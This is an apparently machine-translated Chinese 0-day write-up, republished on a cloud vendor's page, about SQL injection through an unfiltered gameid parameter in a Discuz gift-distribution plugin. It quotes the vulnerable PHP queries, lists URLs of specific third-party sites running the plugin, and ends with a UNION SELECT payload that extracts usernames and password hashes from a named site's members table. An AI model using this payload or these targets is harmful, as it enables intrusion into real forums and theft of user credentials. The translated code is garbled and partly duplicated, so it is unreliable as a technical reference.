Discuz plug-in account distribution system injection 0 day

Source: Internet
Author: User

Plug-in name: 2Fly gift (serial number) Issuing System
Vulnerability file: 2fly_gift.php (the latest version only)
Author: CN. Tnik & Tojen (fellow villagers)

Code Analysis:
It is mainly because the gameid parameter is not filtered, leading to injection.
1. gameid under the output branch General browse copy code Print Code
$ Query = $ db-> query ("Select * FROM '{$ tablepre} 2fly_gift 'where 'id' = $ gameid LIMIT 1 ");
$ Game = $ db-> fetch_array ($ query );

$ Query = $ db-> query ("Select * FROM '{$ tablepre} 2fly_gift 'where 'id' = $ gameid LIMIT 1 ");
$ Game = $ db-> fetch_array ($ query)
Http://www.klcwsj.com/2fly_gift.php? Action = output & gameid = 45
Http://bbs.yeswan.com/2fly_gift.php? Action = output & gameid = 16
But there is no data display bit after union, but no data
2. The gameid under the branch of ipvsors is not filtered: normal browsing, copying, and printing code
$ Query = $ db-> query ("Select id, good_names, acc, total, remain, record, expiration FROM '{$ tablepre} 2fly_gift' Where 'id' = $ gameid LIMIT 1 ");
$ Game = $ db-> fetch_array ($ query );

$ Query = $ db-> query ("Select id, good_names, acc, total, remain, record, expiration FROM '{$ tablepre} 2fly_gift' Where 'id' = $ gameid LIMIT 1 ");
$ Game = $ db-> fetch_array ($ query); http://bbs.yeswan.com/2fly_gift... ecord & gameid = 17
Obvious injection, which was originally intended to be usable, but appeared unexpectedly: Common browsing, copying, and printing code
$ Recordb = explode (||, $ game [record]);
$ Acc2 = explode ("", $ game [acc]);
$ Remain = $ game [remain];
$ Remain2 = $ game [remain] + 1;

/* Analyze the uid of the member you have received */
Foreach ($ recordb as $ recordnow)
{
$ Recordc = explode (_, $ recordnow );
$ Recordd [] = substr ($ recordc [0], 1 );
$ TsbuserID [] = $ recordc [0];
$ Tsbfafang [] = $ recordc [1];
$ RandomPW [] = $ recordc [2];
$ CheckboxTsb [] = $ recordc [3];
If (substr ($ recordc [0], 1 )! =)
{
If ($ recordc [0])
$ Uids. =,. substr ($ recordc [0], 1 );
}

}


$ Table. = "<form name = form1 method = post action = 2fly_gift.php? Action = extends SORS & pages = view_record_edit & gameid = ".
$ Gameid. "> ";

/* Read the user name */
$ Uidss = array ();
$ Uidquery = $ db-> query ("Select uid, username FROM {$ tablepre} members Where uid IN (".
Substr ($ uids, 1). ") orDER BY uid ASC ");

$ Recordb = explode (||, $ game [record]);
$ Acc2 = explode ("", $ game [acc]);
$ Remain = $ game [remain];
$ Remain2 = $ game [remain] + 1;

/* Analyze the uid of the member you have received */
Foreach ($ recordb as $ recordnow)
{
$ Recordc = explode (_, $ recordnow );
$ Recordd [] = substr ($ recordc [0], 1 );
$ TsbuserID [] = $ recordc [0];
$ Tsbfafang [] = $ recordc [1];
$ RandomPW [] = $ recordc [2];
$ CheckboxTsb [] = $ recordc [3];
If (substr ($ recordc [0], 1 )! =)
{
If ($ recordc [0])
$ Uids. =,. substr ($ recordc [0], 1 );
}

}


$ Table. = "<form name = form1 method = post action = 2fly_gift.php? Action = extends SORS & pages = view_record_edit & gameid = ".
$ Gameid. "> ";

/* Read the user name */
$ Uidss = array ();
$ Uidquery = $ db-> query ("Select uid, username FROM {$ tablepre} members Where uid IN (".
Substr ($ uids, 1 ). ") orDER BY uid ASC"); as long as and 1 = 2 $ uids is added, it is null. An error occurs. It is blocked here, and no data is displayed, if you don't talk about it in other places, check if there are any good methods to break through. There are some update SQL statements in it, and you don't know if it can be used.
However, previous versions are still available:
There is a content Branch:
Http://www.iacct.cn/2fly_gift.php? Pages = content & gameid = 16 and 1 = 2 union select 1, 2, 3, 4, concat (username,

0x3a, password), 6, 7, 8, 9, 10, 11, 12, 13, 16, 17, 18, 19, 20, 21, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37 from week
Password burst

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.